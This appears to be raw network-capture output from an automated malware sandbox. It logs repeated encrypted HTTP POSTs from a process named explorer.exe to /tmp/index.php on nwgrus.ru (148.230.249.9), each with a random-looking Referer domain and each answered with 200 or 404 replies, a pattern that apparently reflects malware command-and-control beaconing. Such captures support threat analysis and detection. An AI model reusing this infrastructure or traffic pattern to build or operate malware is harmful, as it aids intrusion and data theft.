Oct 13, 2024 18:27:48.893680096 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:48 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	64972	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:48.933195114 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bsujqjcrhguj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: nwgrus.ru
Oct 13, 2024 18:27:48.933260918 CEST	112	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7f 22 db f9 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu"m[k@y`dsJnaX
Oct 13, 2024 18:27:49.898473024 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	64973	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:49.911473989 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://akxpcpdhnwlcvewi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: nwgrus.ru
Oct 13, 2024 18:27:49.911564112 CEST	226	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2d 2f cc f5 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu-/lE`y;^")q3qTP9)$P^@Df}U%J}cHHlHBRjyqTw)7
Oct 13, 2024 18:27:50.853787899 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	64974	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:50.863857985 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yvuudhqxndfwr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nwgrus.ru
Oct 13, 2024 18:27:50.863874912 CEST	234	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 35 5e f1 ad Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu5^irF!Oz~jx*X=u$[@u]$Be::Yw}Tc7<7](. mBzvIX0
Oct 13, 2024 18:27:51.826019049 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	64975	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:51.835762024 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fgueognrgcdryprb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: nwgrus.ru
Oct 13, 2024 18:27:51.835762978 CEST	241	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 5e 32 d3 81 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu^25qKZg2c<RAZ4v?'R'Mj0F)PbR7n-N([rcbP=:Dk]Gz
Oct 13, 2024 18:27:52.776384115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	64976	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:52.789835930 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hvywquxnrrbp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: nwgrus.ru
Oct 13, 2024 18:27:52.789871931 CEST	347	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 59 1e e7 f4 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuYn@sXDfcEc4e5^;+KF'>\)o_>UvGYK{gJ{Pu"FT3#F\|bpVwU_u]t<>=5
Oct 13, 2024 18:27:53.737190962 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	64977	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:53.747736931 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cacpihwweubtsxg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: nwgrus.ru
Oct 13, 2024 18:27:53.747826099 CEST	238	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 45 b9 e0 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu5E;]kmEb3WX%;Cq{\|I~KZ@DvQEt.KE$HpTsjYH!\|rUGU'blr)8n
Oct 13, 2024 18:27:54.709198952 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:54 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	64978	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:54.720984936 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rqcdsrhbxdj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: nwgrus.ru
Oct 13, 2024 18:27:54.720984936 CEST	340	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 43 1b a7 92 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuC3SEux+Pk gdH=p4 Lbg@MjV*/e_SZ;epEQE"0?;~".s[-][@
Oct 13, 2024 18:27:55.663595915 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	64979	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:55.673388004 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://llagbnlopmmumxog.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: nwgrus.ru
Oct 13, 2024 18:27:55.673423052 CEST	337	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3b 52 d7 86 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu;Rb:mB]u%EAp['p2"1#i$M$SdgB^h/@>Wjo"[+MP7Z$&X\|H._-L;
Oct 13, 2024 18:27:56.622756004 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	64981	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:56.633893013 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kdhqngbaswv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: nwgrus.ru
Oct 13, 2024 18:27:56.633893013 CEST	293	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5e 31 ea e3 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu^1^*wCVinrZz2{Mo,r':F+dPzqf='_h\`u;J ,U-yWU:g>K002
Oct 13, 2024 18:27:57.589418888 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	64987	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:57.600322008 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ttjnxnssovi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: nwgrus.ru
Oct 13, 2024 18:27:57.600322008 CEST	305	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2f 4e a0 8d Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu/NpjCJ?TgQs0/:>DC}HMn%_/-a}hI nrJJMC%@/(w/yBxyoZ]2b)[A
Oct 13, 2024 18:27:58.543081999 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	64993	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:58.552355051 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxvsopepyhexw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 277 Host: nwgrus.ru
Oct 13, 2024 18:27:58.552355051 CEST	277	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 42 4e dd fd Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuBNZj@{33JMOjvZuK.^\L4jmVC$<n!B-~/!_#2'?%lRy }Pf~VY-
Oct 13, 2024 18:27:59.554004908 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:59 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	64999	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:59.576095104 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://icsnyxejpjswt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
